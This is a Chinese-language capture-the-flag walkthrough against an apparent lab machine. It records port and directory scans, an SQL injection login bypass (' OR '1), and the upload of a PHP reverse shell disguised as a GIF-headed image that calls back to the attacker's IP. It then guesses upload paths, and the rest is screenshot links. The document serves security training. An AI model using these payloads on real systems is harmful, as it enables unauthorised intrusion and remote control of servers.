![\"image-20240316180300792\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116199.png\")
<\/div><\/p>\n\u4e0d\u5230\u9ec4\u6cb3\u5fc3\u4e0d\u6b7b\uff0c\u5c31\u662f\u4e0d\u7528virtualbox\uff08\u914d\u9776\u573a\u914d\u5230\u4e27\u5fc3\u75c5\u72c2\uff09\u3002<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u626b\u4e00\u4e0b\uff1a<\/p>\n
nmap -p- -T4 -sV 10.161.187.177<\/code><\/pre>\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-16 06:10 EDT\nNmap scan report for 10.161.187.177\nHost is up (0.00079s latency).\nNot shown: 65533 closed tcp ports (conn-refused)\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)\n80\/tcp open http Apache httpd 2.4.52 ((Ubuntu))\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 9.17 seconds<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ndirsearch -u http:\/\/10.161.187.177 -e* -i 200,300-399<\/code><\/pre>\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ dirsearch -u http:\/\/10.161.187.177 -e* -i 200,300-399 \n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| ) \nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\nOutput File: \/home\/kali\/reports\/http_10.161.187.177\/_24-03-16_06-13-08.txt\nTarget: http:\/\/10.161.187.177\/\n[06:13:08] Starting:\n[06:13:09] 301 - 313B - \/js -> http:\/\/10.161.187.177\/js\/ \n[06:13:11] 200 - 417B - \/.well-known\/security.txt \n[06:13:12] 200 - 2KB - \/404.html \n[06:13:27] 301 - 318B - \/careers -> http:\/\/10.161.187.177\/careers\/ \n[06:13:30] 301 - 314B - \/css -> http:\/\/10.161.187.177\/css\/ \n[06:13:30] 301 - 319B - \/customer -> http:\/\/10.161.187.177\/customer\/ \n[06:13:34] 301 - 316B - \/fonts -> http:\/\/10.161.187.177\/fonts\/ \n[06:13:36] 301 - 317B - \/images -> http:\/\/10.161.187.177\/images\/ \n[06:13:36] 301 - 314B - \/img -> http:\/\/10.161.187.177\/img\/ \n[06:13:39] 301 - 314B - \/lib -> http:\/\/10.161.187.177\/lib\/ \n[06:13:42] 301 - 318B - \/modules -> http:\/\/10.161.187.177\/modules\/ \n[06:13:51] 200 - 32B - \/robots.txt \nTask Completed <\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n
\u67e5\u770b\u4e00\u4e0b\u7f51\u9875\uff0c\u4f3c\u4e4e\u662f\u4e00\u4e2a\u4f01\u4e1a\u7f51\u7ad9\uff1a<\/p>\n
![\"image-20240316181427291\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\nWappalyzer\u63d2\u4ef6\u67e5\u770b<\/h3>\n
<\/div><\/p>\n\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n# http:\/\/10.161.187.177\/robots.txt\nUser-agent: *\nDisallow: \/admin\/<\/code><\/pre>\n# http:\/\/10.161.187.177\/.well-known\/security.txt\nContact:\n- mailto:super.secure@quick.hmv (Serious business only)\n- tel:+1-800-NO-HACKS (Available 24\/7, except on April Fools' Day)\n\nPolicy: https:\/\/quick.hmv\/security-policy\nEncryption: https:\/\/quick.hmv\/pgp-key.txt\nAcknowledgments: https:\/\/quick.hmv\/security-hall-of-fame.html\nPreferred-Languages: en, es, fr, nl, de\nCanonical: https:\/\/quick.hmv\/.well-known\/security.txt\nPolicy: https:\/\/quick.hmv\/security-policy\nHiring: https:\/\/quick.hmv\/careers\/security-engineer.html\nCSAF: https:\/\/quick.hmv\/csaf-provider-metadata.json\n# If you've made it this far, congratulations! As a reward, here's a secret:\n# We hid an Easter egg in our website's source code. Can you find it?\n# Happy hunting!<\/code><\/pre>\n\u8e29\u70b9<\/h3>\n
\u53bb\u7f51\u9875\u770b\u770b\uff0c\u70b9\u51fb\u53f3\u4e0a\u89d2\uff0c\u53d1\u73b0\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u5f31\u5bc6\u7801\u4ee5\u53ca\u4e07\u80fd\u5bc6\u7801\uff1a<\/p>\n
<\/div><\/p>\n\u600e\u4e48\u56de\u4e8b\uff0c\u600e\u4e48\u5728\u8fd9\u91cc\u5f39\u51fa\u6765\u4e86\uff0c\u67e5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff1a<\/p>\n
<\/div><\/p>\n\u4f3c\u4e4e\u662f\u4fdd\u5b58\u767b\u5f55\u8bb0\u5f55\u7684\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u6ce8\u518c\u4e00\u4e2a\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u6ce8\u518c\u6210\u529f\u4e86\uff0c\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u5230\u5904\u770b\u770b\uff1a<\/p>\n
<\/div><\/p>\n\u6709\u4e2a\u6539\u5bc6\u7801\u7684\u5730\u65b9\u3002<\/p>\n
<\/div><\/p>\n\u6709\u4e2a\u6dfb\u52a0\u6570\u636e\u7684\u5730\u65b9\uff0c\u53ef\u4ee5\u5c1d\u8bd5sql\u6ce8\u5165\u3002<\/p>\n
<\/div><\/p>\n\u8fd8\u6709\u4e00\u4e9b\u7528\u6237\u4fe1\u606f\uff0c\u548b\u50cfdb\u7f51\u7ad9\uff0c\u4f46\u662f\u90fd\u70b9\u4e0d\u4e86\u3002<\/p>\n
\u5bfb\u627e\u6f0f\u6d1e<\/h3>\n
<\/div><\/p>\n<\/div><\/p>\n\u53d1\u73b0\u5bc6\u7801\u53ef\u4ee5\u6539\uff0c\u800c\u4e14\u7f51\u9875\u4e3a?id=29<\/code>\uff0c\u5c1d\u8bd5\u6362\u6210\u5176\u4ed6\u7684\u8bd5\u8bd5\uff0c\u4f46\u662f\u6ca1\u53d1\u751f\u53d8\u5316\u3002\u53ea\u80fd\u53bb\u770b\u770b\u5176\u4ed6\u65b9\u6cd5\u4e86\uff0c\u518d\u4fe1\u606f\u641c\u96c6\u4e00\u6ce2\u3002<\/p>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nnikto -h http:\/\/10.161.187.177<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 10.161.187.177\n+ Target Hostname: 10.161.187.177\n+ Target Port: 80\n+ Start Time: 2024-03-16 07:04:52 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.52 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/robots.txt: contains 1 entry which should be manually viewed. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Glossary\/Robots.txt\n+ \/images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https:\/\/portswigger.net\/kb\/issues\/00600300_private-ip-addresses-disclosed\n+ \/images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP\/1.0. The value is "127.0.1.1". See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2000-0649\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: c8d6, size: 6103122781180, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ Apache\/2.4.52 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .\n+ 8103 requests: 0 error(s) and 8 item(s) reported on remote host\n+ End Time: 2024-03-16 07:05:08 (GMT-4) (16 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u521a\u521a\u90a3\u4e2a\u7591\u4f3c\u7684\u5730\u65b9\u6211\u8bd5\u4e86\u51e0\u4e2a\u6ca1\u6709\u8bd5\u51fa\u6765\u6709\u5565\u5229\u7528\u70b9\u3002<\/p>\n
\u91cd\u65b0\u4fe1\u606f\u641c\u96c6<\/h2>\n
\u770b\u4e00\u4e0b\u5176\u4ed6\u7684\u76ee\u5f55\u5427\uff0c\u6ce8\u518c\u8fdb\u53bb\u7684\u6ca1\u6709\u5565\u6536\u83b7\uff0c\u6ca1\u5565\u4e1c\u897f\u554a\uff01\u96be\u9053\u9057\u6f0f\u4e86\u5565\uff1f\u91cd\u65b0\u626b\u4e00\u4e0b<\/p>\n
\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 10.161.187.177<\/code><\/pre>\nPORT STATE SERVICE REASON\n22\/tcp open ssh syn-ack\n80\/tcp open http syn-ack<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/10.161.187.177 -f -t 200\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/10.161.187.177\n[+] Method: GET\n[+] Threads: 200\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Add Slash: true\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/img\/ (Status: 403) [Size: 279]\n\/icons\/ (Status: 403) [Size: 279]\n\/css\/ (Status: 403) [Size: 279]\n\/lib\/ (Status: 403) [Size: 279]\n\/js\/ (Status: 403) [Size: 279]\n\/customer\/ (Status: 200) [Size: 2172]\n\/images\/ (Status: 403) [Size: 279]\n\/fonts\/ (Status: 403) [Size: 279]\n\/employee\/ (Status: 200) [Size: 3684]\n\/modules\/ (Status: 403) [Size: 279]\n\/careers\/ (Status: 403) [Size: 279]\n\/server-status\/ (Status: 403) [Size: 279]\nProgress: 143599 \/ 220561 (65.11%)[ERROR] Get "http:\/\/10.161.187.177\/customized\/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u6398<\/h2>\nsql\u6ce8\u5165<\/h3>\n
\u53c8\u591a\u626b\u51fa\u6765\u4e00\u4e2a\u76ee\u5f55employee<\/code>\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<\/div><\/p>\n\u53c8\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u6211\u64e6\u3002\u5c1d\u8bd5\u767b\u5f55\u53d1\u73b0\u5931\u8d25\u4e86\uff0c\u5e94\u8be5\u662f\u7ba1\u7406\u754c\u9762\uff1a<\/p>\n
\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\uff0c\u5931\u8d25\uff0c\u5f31\u5bc6\u7801\u4e5f\u5931\u8d25\u4e86\u3002<\/p>\n
\u518d\u8bd5\u8bd5\u5176\u4ed6\u7684\u65b9\u6cd5\uff0c\u7528\u6237\u540d\u4f3c\u4e4e\u5fc5\u987b\u5f97\u662f\u7b26\u5408\u8981\u6c42\u7684\uff0c\u5c1d\u8bd5\u5728\u5bc6\u7801\u7aef\u8fdb\u884c\u6ce8\u5165\uff1a<\/p>\n
<\/div><\/p>\n\u5931\u8d25\u4e86\uff0c\u4f46\u662f\u4f3c\u4e4e\u6709\u70b9\u4f5c\u7528\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u4e00\u4e0b\u5176\u4ed6\u7684payload\uff0c\u5c71\u7a77\u6c34\u5c3d\u7684\u65f6\u5019\u518d\u8bd5\u8bd5sqlmap\u3002<\/p>\n
\u65e0\u610f\u4e2d\u8bd5\u51fa\u6765\u4e86\u4e00\u79cd\uff1a' OR '1<\/code><\/p>\n<\/div><\/p>\n\u53ef\u4ee5\u5b66\u4e60\u53c2\u8003\uff1ahttps:\/\/github.com\/payloadbox\/sql-injection-payload-list<\/a><\/p>\n\u56fe\u7247\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n
\u5c1d\u8bd5\u5bfb\u627e\u53ef\u4ee5\u4e0a\u4f20\u6587\u4ef6\u7684\u5730\u65b9\uff1a<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u4e00\u4e2a\u4e0a\u4f20\u70b9\uff0c\u4e0d\u8fc7\u662f\u4e0a\u4f20\u5934\u50cf\u7684\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ head reverseShell.jpg \nGIF89a\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '10.161.181.188'; \/\/ You have changed this\n $port = 1234; \/\/ And this\n $chunk_size = 1400;<\/code><\/pre>\n\u5148\u5c1d\u8bd5\u6dfb\u52a0\u4e00\u4e2a\u5458\u5de5\u8bd5\u8bd5\uff1a<\/p>\n
<\/div><\/p>\n\u5361\u4f4f\u4e86\uff0c\u5636\u3002\u770b\u6765\u4e0d\u9614\u4ee5\uff0c\u4e0a\u4f20\u5427\uff0c\u4f46\u662f\u70b9\u51fb\u5b8c\u53c8\u5f39\u5230\u6dfb\u52a0\u8fd9\u4e86\uff0c\u6211\u8fd8\u4ee5\u4e3a\u662f\u6211\u521a\u521a\u81ea\u5df1\u70b9\u7684\u5462\uff0c\u53ef\u80fd\u4e0a\u4f20\u6210\u529f\u4e86\uff0c\u5c1d\u8bd5\u67e5\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n<\/div><\/p>\n\u96be\u9053\u6ca1\u6210\u529f\uff0c\u518d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u611f\u89c9\u662f\u6210\u529f\u4e86\u554a\uff0c\u90fd\u590d\u539f\u5230\u6dfb\u52a0\u7528\u6237\u7684\u4f4d\u7f6e\u4e86\u3002<\/p>\n
\u96be\u9053\u5904\u7406\u4e86\uff1f\u8fd9\u548b\u731c\u554a\u3002<\/p>\n
http:\/\/10.161.187.177\/employee\/uploads\/img_reverseShell.jpg<\/a><\/del><\/p>\nhttp:\/\/10.161.187.177\/employee\/uploads\/image_reverseShell.jpg<\/a><\/del><\/p>\n\u603b\u4e0d\u81f3\u4e8e\u628a\u540d\u5b57\u968f\u673a\u5316\u6210\u5b57\u7b26\u4e32\u4e86\u5427\uff0c\u96be\u9053\u6ca1\u4e0a\u4f20\u6210\u529f\uff1f<\/p>\n
http:\/\/10.161.187.177\/employee\/uploads\/_reverseShell.jpg<\/a><\/del><\/p>\nhttp:\/\/10.161.187.177\/employee\/uploads\/employee_reverseShell.jpg<\/a><\/del><\/p>\nhttp:\/\/10.161.187.177\/employee\/uploads\/2024-03-16_reverseShell.jpg<\/a><\/del><\/p>\nhttp:\/\/10.161.187.177\/employee\/uploads\/reverseShell_2024-03-16.jpg<\/a><\/del><\/p>\n\u7ecf\u7fa4\u91cc\u5e08\u5085\u4eec\u63d0\u793a\uff08\u597d\u5427\u662f\u6211\u5077\u5077\u7ffb\u4e86\u804a\u5929\u8bb0\u5f55\uff09\uff0c\u53d1\u73b0\u540d\u5b57\u4e3a\uff1a<\/p>\n
http:\/\/10.161.187.177\/employee\/uploads\/1_reverseShell.jpg<\/a><\/del><\/p>\n
![\"image-20240316181427291\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116203.png\")
<\/div><\/p>\n![\"image-20240316181602049\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116206.png\")
<\/div><\/p>\n![\"image-20240316182253075\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116207.png\")
<\/div><\/p>\n![\"image-20240316182407592\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116208.png\")
<\/div><\/p>\n![\"image-20240316182550496\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116209.png\")
<\/div><\/p>\n![\"image-20240316182653442\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116210.png\")
<\/div>![\"image-20240316182721096\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116211.png\")
<\/div><\/p>\n![\"image-20240316182746802\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116212.png\")
<\/div><\/p>\n![\"image-20240316182930820\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116213.png\")
<\/div><\/p>\n![\"image-20240316183036998\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116214.png\")
<\/div><\/p>\n![\"image-20240316183110618\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116215.png\")
<\/div><\/p>\n![\"image-20240316183352229\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116216.png\")
<\/div><\/p>\n![\"image-20240316184504022\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116217.png\")
<\/div><\/p>\n![\"image-20240316191817121\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116218.png\")
<\/div><\/p>\n![\"image-20240316192523643\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116219.png\")
<\/div><\/p>\n![\"image-20240316192544911\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116220.png\")
<\/div><\/p>\n![\"image-20240316192758082\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116221.png\")
<\/div><\/p>\n![\"image-20240316193209601\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116222.png\")
<\/div><\/p>\n![\"image-20240316193543842\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116223.png\")
<\/div><\/p>\n![\"image-20240316194353950\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116224.png\")
<\/div><\/p>\n![\"image-20240316194146174\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116225.png\")
<\/div><\/p>\n![\"image-20240316194257971\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116226.png\")
<\/div><\/p>\n![\"image-20240316195129340\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116227.png\")
<\/div><\/p>\n![\"image-20240316195651260\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116228.png\")
<\/div><\/p>\n![\"image-20240316195914182\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116229.png\")
<\/div><\/p>\n![\"image-20240316200307315\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116230.png\")
<\/div><\/p>\n![\"image-20240316203817778\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116232.png\")
<\/div><\/p>\n![\"image-20240316211350091\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116233.png\")
<\/div><\/p>\n